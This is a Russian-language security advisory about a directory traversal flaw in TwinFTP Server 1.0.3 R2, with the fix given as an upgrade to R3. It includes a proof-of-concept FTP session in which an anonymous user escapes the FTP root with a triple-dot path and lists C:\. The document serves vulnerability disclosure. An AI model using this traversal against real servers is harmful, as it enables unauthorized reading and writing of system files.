Security Lab

Доступ к произвольным файлам в TwinFTP Server

Дата публикации:13.09.2004
Дата изменения:30.01.2009
Всего просмотров:1430
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Раскрытие системных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Twin FTP Server 1.x
Уязвимые версии: TwinFTP Server 1.0.3 R2

Описание: Уязвимость обнаружена в TwinFTP Server. Удаленный авторизованный пользователь может записывать файлы, расположенные вне FTP каталога.

Сервер не проверяет данные пользователя в FTP командах. Удаленный авторизованный пользователь может представить специально обработанное имя каталога, содержащее последовательность символов обхода каталога '.../' к CWD, STOR и RETR командам, чтобы записать произвольные файлы в произвольное местоположение с привилегиями FTP сервера.

Пример/Эксплоит:

C:\>ftp 192.168.1.7
Connected to 192.168.1.7.
220 TwinFTP Server Standard 1.0.3 R2 (win32)
User (192.168.1.7:(none)): anonymous
331 Need password.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ..
550 CDUP command failure, need account.
ftp> cd ...\windows				Using triple dots ... to change directory to C:\windows
250 Directory changed to ...\windows
ftp> cd ..					
250 CDUP command successfully.				Now we are at C:\
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
ntldr							Directory listing of C:\
NTDETECT.COM
boot.ini
CONFIG.SYS
AUTOEXEC.BAT
IO.SYS
MSDOS.SYS
pagefile.sys
nessuswx.dbg
_NavCClt.Log
uspscan.cab

226 Data transfer successfully.
ftp: 133 bytes received in 0.01Seconds 13.30Kbytes/sec.
ftp>

URL производителя: http://www.twinftp.com/

Решение:Установите обновленную версию программы (1.0.3 R3)

Ссылки: http://www.security.org.sg/vuln/twinftp103r2.html